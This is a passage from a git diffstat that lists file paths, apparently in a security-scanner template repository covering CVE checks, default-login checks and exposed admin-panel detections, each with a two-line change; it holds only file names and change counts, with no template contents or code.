http/cves/2022/CVE-2022-38794.yaml | 2 +- http/cves/2022/CVE-2022-38817.yaml | 2 +- http/cves/2022/CVE-2022-38870.yaml | 2 +- http/cves/2022/CVE-2022-3908.yaml | 2 +- http/cves/2022/CVE-2022-39195.yaml | 2 +- http/cves/2022/CVE-2022-3933.yaml | 2 +- http/cves/2022/CVE-2022-3934.yaml | 2 +- http/cves/2022/CVE-2022-3982.yaml | 2 +- http/cves/2022/CVE-2022-39952.yaml | 2 +- http/cves/2022/CVE-2022-39960.yaml | 2 +- http/cves/2022/CVE-2022-40083.yaml | 2 +- http/cves/2022/CVE-2022-40359.yaml | 2 +- http/cves/2022/CVE-2022-4050.yaml | 2 +- http/cves/2022/CVE-2022-4060.yaml | 2 +- http/cves/2022/CVE-2022-4063.yaml | 2 +- http/cves/2022/CVE-2022-40684.yaml | 2 +- http/cves/2022/CVE-2022-40734.yaml | 2 +- http/cves/2022/CVE-2022-40879.yaml | 2 +- http/cves/2022/CVE-2022-40881.yaml | 2 +- http/cves/2022/CVE-2022-4117.yaml | 2 +- http/cves/2022/CVE-2022-4140.yaml | 2 +- http/cves/2022/CVE-2022-41473.yaml | 2 +- http/cves/2022/CVE-2022-41840.yaml | 2 +- http/cves/2022/CVE-2022-42233.yaml | 2 +- http/cves/2022/CVE-2022-4260.yaml | 2 +- http/cves/2022/CVE-2022-42746.yaml | 2 +- http/cves/2022/CVE-2022-42747.yaml | 2 +- http/cves/2022/CVE-2022-42748.yaml | 2 +- http/cves/2022/CVE-2022-42749.yaml | 2 +- http/cves/2022/CVE-2022-4301.yaml | 2 +- http/cves/2022/CVE-2022-43014.yaml | 2 +- http/cves/2022/CVE-2022-43015.yaml | 2 +- http/cves/2022/CVE-2022-43016.yaml | 2 +- http/cves/2022/CVE-2022-43017.yaml | 2 +- http/cves/2022/CVE-2022-43018.yaml | 2 +- http/cves/2022/CVE-2022-4306.yaml | 2 +- http/cves/2022/CVE-2022-43140.yaml | 2 +- http/cves/2022/CVE-2022-4320.yaml | 2 +- http/cves/2022/CVE-2022-4325.yaml | 2 +- http/cves/2022/CVE-2022-43769.yaml | 2 +- http/cves/2022/CVE-2022-4447.yaml | 2 +- http/cves/2022/CVE-2022-44877.yaml | 2 +- http/cves/2022/CVE-2022-45362.yaml | 2 +- http/cves/2022/CVE-2022-45805.yaml | 2 +- http/cves/2022/CVE-2022-45835.yaml | 2 +- http/cves/2022/CVE-2022-45917.yaml | 2 +- http/cves/2022/CVE-2022-45933.yaml | 2 +- http/cves/2022/CVE-2022-46169.yaml | 2 +- http/cves/2022/CVE-2022-46381.yaml | 2 +- http/cves/2022/CVE-2022-46888.yaml | 2 +- http/cves/2022/CVE-2022-47002.yaml | 2 +- http/cves/2022/CVE-2022-47003.yaml | 2 +- http/cves/2022/CVE-2022-47945.yaml | 2 +- http/cves/2022/CVE-2022-47966.yaml | 2 +- http/cves/2022/CVE-2022-47986.yaml | 2 +- http/cves/2022/CVE-2022-48012.yaml | 2 +- http/cves/2022/CVE-2022-48165.yaml | 2 +- http/cves/2022/CVE-2022-4897.yaml | 2 +- http/cves/2023/CVE-2023-0236.yaml | 2 +- http/cves/2023/CVE-2023-0261.yaml | 2 +- http/cves/2023/CVE-2023-0552.yaml | 2 +- http/cves/2023/CVE-2023-0669.yaml | 2 +- http/cves/2023/CVE-2023-0942.yaml | 2 +- http/cves/2023/CVE-2023-0968.yaml | 2 +- http/cves/2023/CVE-2023-1080.yaml | 2 +- http/cves/2023/CVE-2023-1177.yaml | 2 +- http/cves/2023/CVE-2023-23488.yaml | 2 +- http/cves/2023/CVE-2023-23489.yaml | 2 +- http/cves/2023/CVE-2023-23492.yaml | 2 +- http/cves/2023/CVE-2023-23752.yaml | 2 +- http/cves/2023/CVE-2023-24044.yaml | 2 +- http/cves/2023/CVE-2023-24278.yaml | 2 +- http/cves/2023/CVE-2023-24322.yaml | 2 +- http/cves/2023/CVE-2023-24367.yaml | 2 +- http/cves/2023/CVE-2023-24657.yaml | 2 +- http/cves/2023/CVE-2023-24733.yaml | 2 +- http/cves/2023/CVE-2023-24735.yaml | 2 +- http/cves/2023/CVE-2023-24737.yaml | 2 +- http/cves/2023/CVE-2023-26255.yaml | 2 +- http/cves/2023/CVE-2023-26256.yaml | 2 +- http/cves/2023/CVE-2023-27159.yaml | 2 +- http/cves/2023/CVE-2023-27292.yaml | 2 +- http/cves/2023/CVE-2023-27587.yaml | 2 +- http/cves/2023/CVE-2023-28343.yaml | 2 +- http/cves/2023/CVE-2023-28432.yaml | 2 +- http/default-logins/3com/3com-nj2000-default-login.yaml | 2 +- http/default-logins/UCMDB/ucmdb-default-login.yaml | 2 +- http/default-logins/abb/cs141-default-login.yaml | 2 +- http/default-logins/activemq/activemq-default-login.yaml | 2 +- http/default-logins/adminer-default-login.yaml | 2 +- http/default-logins/aem/aem-default-login.yaml | 2 +- http/default-logins/aem/aem-felix-console.yaml | 2 +- http/default-logins/alibaba/canal-default-login.yaml | 2 +- http/default-logins/alphaweb/alphaweb-default-login.yaml | 2 +- http/default-logins/ambari/ambari-default-login.yaml | 2 +- http/default-logins/apache/airflow-default-login.yaml | 2 +- http/default-logins/apache/apisix-default-login.yaml | 2 +- .../default-logins/apache/dolphinscheduler-default-login.yaml | 2 +- http/default-logins/apache/dubbo-admin-default-login.yaml | 2 +- http/default-logins/apache/kafka-center-default-login.yaml | 2 +- http/default-logins/apache/karaf-default-login.yaml | 2 +- http/default-logins/apache/ranger-default-login.yaml | 2 +- http/default-logins/apache/tomcat-default-login.yaml | 2 +- http/default-logins/apache/tomcat-examples-login.yaml | 2 +- http/default-logins/apollo/apollo-default-login.yaml | 2 +- http/default-logins/arl/arl-default-login.yaml | 2 +- http/default-logins/audiocodes/audiocodes-default-login.yaml | 2 +- http/default-logins/azkaban/azkaban-default-login.yaml | 2 +- .../default-logins/chinaunicom/chinaunicom-default-login.yaml | 2 +- http/default-logins/cobbler/cobbler-default-login.yaml | 2 +- http/default-logins/cobbler/hue-default-credential.yaml | 2 +- .../datahub/datahub-metadata-default-login.yaml | 2 +- http/default-logins/dataiku/dataiku-default-login.yaml | 2 +- http/default-logins/dell/dell-idrac-default-login.yaml | 2 +- http/default-logins/dell/dell-idrac9-default-login.yaml | 2 +- http/default-logins/dell/emcecom-default-login.yaml | 2 +- .../digitalrebar/digitalrebar-default-login.yaml | 2 +- http/default-logins/druid/druid-default-login.yaml | 2 +- http/default-logins/dvwa/dvwa-default-login.yaml | 2 +- http/default-logins/empire/empirec2-default-login.yaml | 2 +- http/default-logins/emqx/emqx-default-login.yaml | 2 +- .../default-logins/exacqvision/exacqvision-default-login.yaml | 2 +- http/default-logins/flir/flir-default-login.yaml | 2 +- http/default-logins/frps/frp-default-login.yaml | 2 +- http/default-logins/fuelcms/fuelcms-default-login.yaml | 2 +- http/default-logins/geoserver/geoserver-default-login.yaml | 2 +- http/default-logins/gitlab/gitlab-weak-login.yaml | 2 +- http/default-logins/glpi/glpi-default-login.yaml | 2 +- http/default-logins/google/google-earth-dlogin.yaml | 2 +- http/default-logins/gophish/gophish-default-login.yaml | 2 +- http/default-logins/grafana/grafana-default-login.yaml | 2 +- http/default-logins/guacamole/guacamole-default-login.yaml | 2 +- http/default-logins/hongdian/hongdian-default-login.yaml | 2 +- http/default-logins/hortonworks/smartsense-default-login.yaml | 2 +- http/default-logins/hp/hp-switch-default-login.yaml | 2 +- .../huawei/huawei-HG532e-default-router-login.yaml | 2 +- http/default-logins/hybris/hybris-default-login.yaml | 2 +- http/default-logins/ibm/ibm-mqseries-default-login.yaml | 2 +- http/default-logins/ibm/ibm-storage-default-credential.yaml | 2 +- .../idemia/idemia-biometrics-default-login.yaml | 2 +- http/default-logins/iptime/iptime-default-login.yaml | 2 +- http/default-logins/jboss/jboss-jbpm-default-login.yaml | 2 +- http/default-logins/jboss/jmx-default-login.yaml | 2 +- http/default-logins/jenkins/jenkins-default.yaml | 2 +- http/default-logins/jinher/jinher-oa-default-login.yaml | 2 +- http/default-logins/jupyterhub/jupyterhub-default-login.yaml | 2 +- http/default-logins/kanboard-default-login.yaml | 2 +- http/default-logins/kettle/kettle-default-login.yaml | 2 +- http/default-logins/lutron/lutron-default-login.yaml | 2 +- http/default-logins/magnolia-default-login.yaml | 2 +- http/default-logins/mantisbt/mantisbt-default-credential.yaml | 2 +- http/default-logins/mobotix/mobotix-default-login.yaml | 2 +- http/default-logins/mofi/mofi4500-default-login.yaml | 2 +- http/default-logins/nagios/nagios-default-login.yaml | 2 +- http/default-logins/nagios/nagiosxi-default-login.yaml | 2 +- http/default-logins/netsus/netsus-default-login.yaml | 2 +- http/default-logins/nexus/nexus-default-login.yaml | 2 +- http/default-logins/nps/nps-default-login.yaml | 2 +- http/default-logins/nsicg/nsicg-default-login.yaml | 2 +- http/default-logins/octobercms/octobercms-default-login.yaml | 2 +- http/default-logins/ofbiz/ofbiz-default-login.yaml | 2 +- http/default-logins/openemr/openemr-default-login.yaml | 2 +- http/default-logins/openwrt/openwrt-default-login.yaml | 2 +- .../oracle/businessintelligence-default-login.yaml | 2 +- http/default-logins/oracle/peoplesoft-default-login.yaml | 2 +- .../others/inspur-clusterengine-default-login.yaml | 2 +- http/default-logins/others/kingsoft-v8-default-login.yaml | 2 +- http/default-logins/others/opencats-default-login.yaml | 2 +- http/default-logins/others/panabit-ixcache-default-login.yaml | 2 +- http/default-logins/others/secnet-ac-default-login.yaml | 2 +- http/default-logins/others/telecom-gateway-default-login.yaml | 2 +- http/default-logins/paloalto/panos-default-login.yaml | 2 +- http/default-logins/panabit/panabit-default-login.yaml | 2 +- http/default-logins/pentaho/pentaho-default-login.yaml | 2 +- http/default-logins/phpmyadmin/phpmyadmin-default-login.yaml | 2 +- http/default-logins/prtg/prtg-default-login.yaml | 2 +- http/default-logins/rabbitmq/rabbitmq-default-login.yaml | 2 +- http/default-logins/rainloop/rainloop-default-login.yaml | 2 +- http/default-logins/rancher/rancher-default-login.yaml | 2 +- http/default-logins/ricoh/ricoh-weak-password.yaml | 2 +- http/default-logins/rockmongo/rockmongo-default-login.yaml | 2 +- http/default-logins/rseenet/rseenet-default-login.yaml | 2 +- http/default-logins/ruckus/ruckus-wireless-default-login.yaml | 2 +- .../default-logins/samsung/samsung-printer-default-login.yaml | 2 +- http/default-logins/samsung/samsung-wlan-default-login.yaml | 2 +- http/default-logins/seeddms/seeddms-default-login.yaml | 2 +- http/default-logins/sequoiadb/sequoiadb-default-login.yaml | 2 +- http/default-logins/showdoc/showdoc-default-login.yaml | 2 +- http/default-logins/solarwinds/solarwinds-default-login.yaml | 2 +- http/default-logins/spectracom/spectracom-default-login.yaml | 2 +- http/default-logins/stackstorm/stackstorm-default-login.yaml | 2 +- http/default-logins/steve/steve-default-login.yaml | 2 +- http/default-logins/supermicro/supermicro-default-login.yaml | 2 +- http/default-logins/szhe/szhe-default-login.yaml | 2 +- http/default-logins/tiny-file-manager-default-login.yaml | 2 +- http/default-logins/tooljet/tooljet-default-login.yaml | 2 +- http/default-logins/trassir/trassir-default-login.yaml | 2 +- http/default-logins/versa/versa-default-login.yaml | 2 +- http/default-logins/versa/versa-flexvnf-default-login.yaml | 2 +- http/default-logins/vidyo/vidyo-default-login.yaml | 2 +- http/default-logins/viewpoint/trilithic-viewpoint-login.yaml | 2 +- http/default-logins/visionhub/visionhub-default-login.yaml | 2 +- http/default-logins/weblogic/weblogic-weak-login.yaml | 2 +- http/default-logins/wifisky/wifisky-default-login.yaml | 2 +- http/default-logins/wildfly/wildfly-default-login.yaml | 2 +- http/default-logins/wso2/wso2-default-login.yaml | 2 +- http/default-logins/xerox/xerox7-default-login.yaml | 2 +- http/default-logins/xnat/xnat-default-login.yaml | 2 +- http/default-logins/xui-weak-login.yaml | 2 +- http/default-logins/xxljob/xxljob-default-login.yaml | 2 +- http/default-logins/zabbix/zabbix-default-login.yaml | 2 +- http/default-logins/zmanda/zmanda-default-login.yaml | 2 +- http/exposed-panels/3cx-phone-management-panel.yaml | 2 +- http/exposed-panels/3cx-phone-webclient-management-panel.yaml | 2 +- http/exposed-panels/3g-wireless-gateway.yaml | 2 +- http/exposed-panels/acemanager-login.yaml | 2 +- http/exposed-panels/achecker-panel.yaml | 2 +- http/exposed-panels/acrolinx-dashboard.yaml | 2 +- http/exposed-panels/active-admin-exposure.yaml | 2 +- http/exposed-panels/activemq-panel.yaml | 2 +- http/exposed-panels/acunetix-login.yaml | 2 +- http/exposed-panels/acunetix-panel.yaml | 2 +- http/exposed-panels/adiscon-loganalyzer.yaml | 2 +- http/exposed-panels/adminer-panel-detect.yaml | 2 +- http/exposed-panels/adminer-panel.yaml | 2 +- http/exposed-panels/adminset-panel.yaml | 2 +- http/exposed-panels/adobe/adobe-component-login.yaml | 2 +- http/exposed-panels/adobe/adobe-connect-central-login.yaml | 2 +- http/exposed-panels/adobe/adobe-experience-manager-login.yaml | 2 +- http/exposed-panels/adobe/adobe-media-server.yaml | 2 +- http/exposed-panels/adobe/aem-crx-package-manager.yaml | 2 +- http/exposed-panels/adobe/aem-sling-login.yaml | 2 +- http/exposed-panels/advance-setup.yaml | 2 +- http/exposed-panels/aerohive-netconfig-ui.yaml | 2 +- http/exposed-panels/aircube-dashboard-panel.yaml | 2 +- http/exposed-panels/aircube-login.yaml | 2 +- http/exposed-panels/airflow-panel.yaml | 2 +- http/exposed-panels/airnotifier-panel.yaml | 2 +- http/exposed-panels/akamai-cloudtest.yaml | 2 +- http/exposed-panels/alfresco-detect.yaml | 2 +- http/exposed-panels/alienvault-usm.yaml | 2 +- http/exposed-panels/allied-telesis-exposure.yaml | 2 +- http/exposed-panels/ambari-exposure.yaml | 2 +- http/exposed-panels/amcrest-login.yaml | 2 +- http/exposed-panels/ametys-admin-login.yaml | 2 +- http/exposed-panels/amp-application-panel.yaml | 2 +- http/exposed-panels/ampache-panel.yaml | 2 +- http/exposed-panels/ampps-admin-panel.yaml | 2 +- http/exposed-panels/ampps-panel.yaml | 2 +- http/exposed-panels/ansible-semaphore-panel.yaml | 2 +- http/exposed-panels/ansible-tower-exposure.yaml | 2 +- http/exposed-panels/apache-jmeter-dashboard.yaml | 2 +- http/exposed-panels/apache/apache-apisix-panel.yaml | 2 +- http/exposed-panels/apache/apache-mesos-panel.yaml | 2 +- http/exposed-panels/apache/public-tomcat-manager.yaml | 2 +- http/exposed-panels/apiman-panel.yaml | 2 +- http/exposed-panels/appsmith-web-login.yaml | 2 +- http/exposed-panels/appwrite-panel.yaml | 2 +- http/exposed-panels/aptus-panel.yaml | 2 +- http/exposed-panels/aqua-enterprise-panel.yaml | 2 +- http/exposed-panels/arcgis/arcgis-panel.yaml | 2 +- http/exposed-panels/arcgis/arcgis-rest-api.yaml | 2 +- http/exposed-panels/archibus-webcentral-panel.yaml | 2 +- http/exposed-panels/argocd-login.yaml | 2 +- http/exposed-panels/arris-modem-detect.yaml | 2 +- http/exposed-panels/aspect-control-panel.yaml | 2 +- http/exposed-panels/asus-router-panel.yaml | 2 +- http/exposed-panels/atlantis-detect.yaml | 2 +- http/exposed-panels/atvise-login.yaml | 2 +- http/exposed-panels/audiocodes-detect.yaml | 2 +- http/exposed-panels/avantfax-panel.yaml | 2 +- http/exposed-panels/avatier-password-management.yaml | 2 +- http/exposed-panels/avaya/avayaaura-cm-panel.yaml | 2 +- http/exposed-panels/avaya/avayaaura-system-manager-panel.yaml | 2 +- http/exposed-panels/aviatrix-panel.yaml | 2 +- http/exposed-panels/avigilon-panel.yaml | 2 +- http/exposed-panels/avtech-avn801-camera-panel.yaml | 2 +- http/exposed-panels/avtech-dvr-exposure.yaml | 2 +- http/exposed-panels/aws-opensearch-login.yaml | 2 +- http/exposed-panels/axel-webserver.yaml | 2 +- http/exposed-panels/axigen-webadmin.yaml | 2 +- http/exposed-panels/axigen-webmail.yaml | 2 +- http/exposed-panels/axway-securetransport-panel.yaml | 2 +- http/exposed-panels/axway-securetransport-webclient.yaml | 2 +- http/exposed-panels/azkaban-web-client.yaml | 2 +- http/exposed-panels/backpack/backpack-admin-panel.yaml | 2 +- http/exposed-panels/barracuda-panel.yaml | 2 +- http/exposed-panels/bazarr-login.yaml | 2 +- http/exposed-panels/bedita-panel.yaml | 2 +- http/exposed-panels/beego-admin-dashboard.yaml | 2 +- http/exposed-panels/beyondtrust-login-server.yaml | 2 +- http/exposed-panels/beyondtrust-panel.yaml | 2 +- http/exposed-panels/bigant-login-panel.yaml | 2 +- http/exposed-panels/bigbluebutton-login.yaml | 2 +- http/exposed-panels/bigfix-login.yaml | 2 +- http/exposed-panels/bigip-rest-panel.yaml | 2 +- http/exposed-panels/biotime-panel.yaml | 2 +- http/exposed-panels/bitdefender-gravityzone.yaml | 2 +- http/exposed-panels/bitrix-panel.yaml | 2 +- http/exposed-panels/black-duck-panel.yaml | 2 +- http/exposed-panels/blue-iris-login.yaml | 2 +- http/exposed-panels/bmc-panel-detect.yaml | 2 +- http/exposed-panels/bmc/bmc-discovery-panel.yaml | 2 +- http/exposed-panels/bolt-cms-panel.yaml | 2 +- http/exposed-panels/bomgar-login-panel.yaml | 2 +- http/exposed-panels/bookstack-panel.yaml | 2 +- http/exposed-panels/buddy-panel.yaml | 2 +- http/exposed-panels/buildbot-panel.yaml | 2 +- http/exposed-panels/cacti-panel.yaml | 2 +- http/exposed-panels/calendarix-panel.yaml | 2 +- http/exposed-panels/call-break-cms.yaml | 2 +- http/exposed-panels/camunda-login-panel.yaml | 2 +- http/exposed-panels/cas-login.yaml | 2 +- http/exposed-panels/casdoor-login.yaml | 2 +- http/exposed-panels/casemanager-panel.yaml | 2 +- http/exposed-panels/caton-network-manager-system.yaml | 2 +- http/exposed-panels/ccm-detect.yaml | 2 +- http/exposed-panels/centreon-panel.yaml | 2 +- http/exposed-panels/cerebro-panel.yaml | 2 +- http/exposed-panels/checkmk/checkmarx-panel.yaml | 2 +- http/exposed-panels/checkmk/checkmk-login.yaml | 2 +- http/exposed-panels/checkpoint-panel.yaml | 2 +- http/exposed-panels/checkpoint/ssl-network-extender.yaml | 2 +- http/exposed-panels/cisco/cisco-ace-device-manager.yaml | 2 +- http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml | 2 +- http/exposed-panels/cisco/cisco-asa-panel.yaml | 2 +- http/exposed-panels/cisco/cisco-edge-340.yaml | 2 +- http/exposed-panels/cisco/cisco-finesse-login.yaml | 2 +- http/exposed-panels/cisco/cisco-integrated-login.yaml | 2 +- http/exposed-panels/cisco/cisco-meraki-exposure.yaml | 2 +- http/exposed-panels/cisco/cisco-prime-infrastructure.yaml | 2 +- http/exposed-panels/cisco/cisco-sd-wan.yaml | 2 +- http/exposed-panels/cisco/cisco-secure-cn.yaml | 2 +- http/exposed-panels/cisco/cisco-secure-desktop.yaml | 2 +- http/exposed-panels/cisco/cisco-sendgrid.yaml | 2 +- http/exposed-panels/cisco/cisco-systems-login.yaml | 2 +- http/exposed-panels/cisco/cisco-telepresence.yaml | 2 +- http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml | 2 +- http/exposed-panels/cisco/cisco-vmanage-login.yaml | 2 +- http/exposed-panels/cisco/cisco-webvpn-detect.yaml | 2 +- http/exposed-panels/citrix-adc-gateway-detect.yaml | 2 +- http/exposed-panels/citrix-vpn-detect.yaml | 2 +- http/exposed-panels/claris-filemaker-webdirect.yaml | 2 +- http/exposed-panels/clave-login-panel.yaml | 2 +- http/exposed-panels/clearpass-policy-manager.yaml | 2 +- http/exposed-panels/cloudphysician-radar.yaml | 2 +- http/exposed-panels/cobbler-webgui.yaml | 2 +- http/exposed-panels/code-server-login.yaml | 2 +- http/exposed-panels/code42-panel.yaml | 2 +- http/exposed-panels/codemeter-webadmin-panel.yaml | 2 +- http/exposed-panels/cofense-vision-panel.yaml | 2 +- http/exposed-panels/coldfusion-administrator-login.yaml | 2 +- http/exposed-panels/compal-panel.yaml | 2 +- http/exposed-panels/completeview-web-panel.yaml | 2 +- http/exposed-panels/concourse-ci-panel.yaml | 2 +- http/exposed-panels/concrete5/concrete5-install.yaml | 2 +- http/exposed-panels/concrete5/concrete5-panel.yaml | 2 +- http/exposed-panels/connect-box-login.yaml | 2 +- http/exposed-panels/connectwise-backup-manager.yaml | 2 +- http/exposed-panels/contao-login-panel.yaml | 2 +- http/exposed-panels/content-central-login.yaml | 2 +- http/exposed-panels/contentkeeper-detect.yaml | 2 +- http/exposed-panels/corebos-panel.yaml | 2 +- http/exposed-panels/cortex-xsoar-login.yaml | 2 +- http/exposed-panels/couchdb-exposure.yaml | 2 +- http/exposed-panels/couchdb-fauxton.yaml | 2 +- http/exposed-panels/cpanel-api-codes.yaml | 2 +- http/exposed-panels/craftcms-admin-panel.yaml | 2 +- http/exposed-panels/creatio-login-panel.yaml | 2 +- http/exposed-panels/crush-ftp-login.yaml | 2 +- http/exposed-panels/crxde-lite.yaml | 2 +- http/exposed-panels/csod-panel.yaml | 2 +- http/exposed-panels/cudatel-panel.yaml | 2 +- http/exposed-panels/cvent-panel-detect.yaml | 2 +- http/exposed-panels/cwp-webpanel.yaml | 2 +- http/exposed-panels/cx-cloud-login.yaml | 2 +- http/exposed-panels/cyberoam-ssl-vpn-panel.yaml | 2 +- http/exposed-panels/d-link-wireless.yaml | 2 +- http/exposed-panels/darktrace-threat-visualizer.yaml | 2 +- http/exposed-panels/datadog-login.yaml | 2 +- http/exposed-panels/dataiku-panel.yaml | 2 +- http/exposed-panels/davantis-panel.yaml | 2 +- http/exposed-panels/daybyday-panel.yaml | 2 +- http/exposed-panels/defectdojo-panel.yaml | 2 +- http/exposed-panels/dell-openmanager-login.yaml | 2 +- http/exposed-panels/dell-wyse-login.yaml | 2 +- http/exposed-panels/delta-login-panel.yaml | 2 +- http/exposed-panels/deluge-webui-panel.yaml | 2 +- http/exposed-panels/dericam-login.yaml | 2 +- http/exposed-panels/digitalrebar-login.yaml | 2 +- http/exposed-panels/directadmin-login-panel.yaml | 2 +- http/exposed-panels/directum-login.yaml | 2 +- http/exposed-panels/django-admin-panel.yaml | 2 +- http/exposed-panels/docebo-elearning-panel.yaml | 2 +- http/exposed-panels/dolibarr-panel.yaml | 2 +- http/exposed-panels/dotclear-panel.yaml | 2 +- http/exposed-panels/dotcms-admin-panel.yaml | 2 +- http/exposed-panels/dplus-dashboard.yaml | 2 +- http/exposed-panels/dqs-superadmin-panel.yaml | 2 +- http/exposed-panels/dradis-pro-panel.yaml | 2 +- http/exposed-panels/drawio-flowchartmaker-panel.yaml | 2 +- http/exposed-panels/drone-ci-panel.yaml | 2 +- http/exposed-panels/druid-console-exposure.yaml | 2 +- http/exposed-panels/druid-panel.yaml | 2 +- http/exposed-panels/drupal-login.yaml | 2 +- http/exposed-panels/dynamicweb-panel.yaml | 2 +- http/exposed-panels/dynatrace-panel.yaml | 2 +- http/exposed-panels/dzzoffice/dzzoffice-install.yaml | 2 +- http/exposed-panels/dzzoffice/dzzoffice-panel.yaml | 2 +- http/exposed-panels/e-mobile-panel.yaml | 2 +- http/exposed-panels/eMerge-panel.yaml | 2 +- http/exposed-panels/ecosys-command-center.yaml | 2 +- http/exposed-panels/edgeos-login.yaml | 2 +- http/exposed-panels/eko-management-console-login.yaml | 2 +- http/exposed-panels/eko-software-update-panel.yaml | 2 +- http/exposed-panels/elemiz-network-manager.yaml | 2 +- http/exposed-panels/emby-panel.yaml | 2 +- http/exposed-panels/emerson-power-panel.yaml | 2 +- http/exposed-panels/emessage-panel.yaml | 2 +- http/exposed-panels/ems-login-panel.yaml | 2 +- http/exposed-panels/ems-webclient-panel.yaml | 2 +- http/exposed-panels/entrust-identityguard.yaml | 2 +- http/exposed-panels/episerver-panel.yaml | 2 +- http/exposed-panels/epson-access-detect.yaml | 2 +- http/exposed-panels/epson-projector-detect.yaml | 2 +- http/exposed-panels/epson-web-control-detect.yaml | 2 +- http/exposed-panels/esphome-panel.yaml | 2 +- http/exposed-panels/esxi-system.yaml | 2 +- http/exposed-panels/eventum-panel.yaml | 2 +- http/exposed-panels/ewm-manager-panel.yaml | 2 +- http/exposed-panels/exagrid-manager-panel.yaml | 2 +- http/exposed-panels/exolis-engage-panel.yaml | 2 +- http/exposed-panels/exposed-webalizer.yaml | 2 +- http/exposed-panels/extreme-netconfig-ui.yaml | 2 +- http/exposed-panels/extron-cms-panel.yaml | 2 +- http/exposed-panels/ez-publish-panel.yaml | 2 +- http/exposed-panels/f-secure-policy-manager.yaml | 2 +- http/exposed-panels/faraday-login.yaml | 2 +- http/exposed-panels/fastapi-docs.yaml | 2 +- http/exposed-panels/fastpanel-hosting-control-panel.yaml | 2 +- http/exposed-panels/fatpipe-ipvpn-panel.yaml | 2 +- http/exposed-panels/fatpipe-mpvpn-panel.yaml | 2 +- http/exposed-panels/fatpipe-warp-panel.yaml | 2 +- http/exposed-panels/fiori-launchpad.yaml | 2 +- http/exposed-panels/fiorilaunchpad-logon.yaml | 2 +- http/exposed-panels/fireware-xtm-user-authentication.yaml | 2 +- http/exposed-panels/flahscookie-superadmin-panel.yaml | 2 +- http/exposed-panels/flightpath-panel.yaml | 2 +- http/exposed-panels/flink-exposure.yaml | 2 +- http/exposed-panels/flip-cms-panel.yaml | 2 +- http/exposed-panels/flowci-panel.yaml | 2 +- http/exposed-panels/flureedb-admin-console.yaml | 2 +- http/exposed-panels/footprints-panel.yaml | 2 +- http/exposed-panels/forcepoint-applicance.yaml | 2 +- http/exposed-panels/forcepoint.yaml | 2 +- http/exposed-panels/forti/fortiadc-panel.yaml | 2 +- http/exposed-panels/fortinet/fortiap-panel.yaml | 2 +- http/exposed-panels/fortinet/fortimail-panel.yaml | 2 +- http/exposed-panels/fortinet/fortinet-fortigate-panel.yaml | 2 +- http/exposed-panels/fortinet/fortinet-fortimanager-panel.yaml | 2 +- http/exposed-panels/fortinet/fortinet-fortinac-panel.yaml | 2 +- http/exposed-panels/fortinet/fortinet-panel.yaml | 2 +- http/exposed-panels/fortinet/fortios-management-panel.yaml | 2 +- http/exposed-panels/fortinet/fortios-panel.yaml | 2 +- http/exposed-panels/fortinet/fortitester-login-panel.yaml | 2 +- http/exposed-panels/fortinet/fortiweb-panel.yaml | 2 +- http/exposed-panels/freeipa-panel.yaml | 2 +- http/exposed-panels/freepbx-administration-panel.yaml | 2 +- http/exposed-panels/froxlor-management-panel.yaml | 2 +- http/exposed-panels/ftm-manager-panel.yaml | 2 +- http/exposed-panels/fuelcms-panel.yaml | 2 +- http/exposed-panels/fuji-xerox-printer-detect.yaml | 2 +- http/exposed-panels/gargoyle-router.yaml | 2 +- http/exposed-panels/genweb-plus-panel.yaml | 2 +- http/exposed-panels/geoserver-login-panel.yaml | 2 +- http/exposed-panels/gerapy-detect.yaml | 2 +- http/exposed-panels/gespage-panel.yaml | 2 +- http/exposed-panels/gira-homeserver-homepage.yaml | 2 +- http/exposed-panels/git-repository-browser.yaml | 2 +- http/exposed-panels/gitblit-panel.yaml | 2 +- http/exposed-panels/gitea-login.yaml | 2 +- http/exposed-panels/github-enterprise-detect.yaml | 2 +- http/exposed-panels/gitlab-detect.yaml | 2 +- http/exposed-panels/globalprotect-panel.yaml | 2 +- http/exposed-panels/glpi-panel.yaml | 2 +- http/exposed-panels/gnu-mailman.yaml | 2 +- http/exposed-panels/go-anywhere-client.yaml | 2 +- http/exposed-panels/goanywhere-mft-login.yaml | 2 +- http/exposed-panels/gocd-login.yaml | 2 +- http/exposed-panels/gocron-panel.yaml | 2 +- http/exposed-panels/gogs-panel.yaml | 2 +- http/exposed-panels/gophish-login.yaml | 2 +- http/exposed-panels/gradle/gradle-cache-node-detect.yaml | 2 +- http/exposed-panels/gradle/gradle-enterprise-panel.yaml | 2 +- http/exposed-panels/grails-database-admin-console.yaml | 2 +- http/exposed-panels/graphite-browser.yaml | 2 +- http/exposed-panels/group-ib-panel.yaml | 2 +- http/exposed-panels/gryphon-login.yaml | 2 +- http/exposed-panels/gyra-master-admin.yaml | 2 +- http/exposed-panels/h2console-panel.yaml | 2 +- http/exposed-panels/hadoop-exposure.yaml | 2 +- http/exposed-panels/hangfire-dashboard.yaml | 2 +- http/exposed-panels/harbor-panel.yaml | 2 +- http/exposed-panels/hashicorp-consul-agent.yaml | 2 +- http/exposed-panels/hashicorp-consul-webgui.yaml | 2 +- http/exposed-panels/hestia-panel.yaml | 2 +- http/exposed-panels/highmail-admin-panel.yaml | 2 +- http/exposed-panels/hitron-technologies.yaml | 2 +- http/exposed-panels/hivemanager-login-panel.yaml | 2 +- http/exposed-panels/hmc-hybris-panel.yaml | 2 +- http/exposed-panels/homematic-panel.yaml | 2 +- http/exposed-panels/honeywell-web-controller.yaml | 2 +- http/exposed-panels/honeywell-xl-web-controller.yaml | 2 +- http/exposed-panels/horde-login-panel.yaml | 2 +- http/exposed-panels/horde-webmail-login.yaml | 2 +- http/exposed-panels/hospital-management-panel.yaml | 2 +- http/exposed-panels/hp-ilo-5.yaml | 2 +- http/exposed-panels/hp-service-manager.yaml | 2 +- http/exposed-panels/hp-virtual-connect-manager.yaml | 2 +- http/exposed-panels/hpe-system-management-login.yaml | 2 +- http/exposed-panels/httpbin-panel.yaml | 2 +- http/exposed-panels/huawei-hg532e-panel.yaml | 2 +- http/exposed-panels/hybris-administration-console.yaml | 2 +- http/exposed-panels/hydra-dashboard.yaml | 2 +- http/exposed-panels/hypertest-dashboard.yaml | 2 +- http/exposed-panels/i-mscp-panel.yaml | 2 +- http/exposed-panels/ibm/ibm-advanced-system-management.yaml | 2 +- http/exposed-panels/ibm/ibm-maximo-login.yaml | 2 +- http/exposed-panels/ibm/ibm-mqseries-web-console.yaml | 2 +- http/exposed-panels/ibm/ibm-note-login.yaml | 2 +- http/exposed-panels/ibm/ibm-security-access-manager.yaml | 2 +- 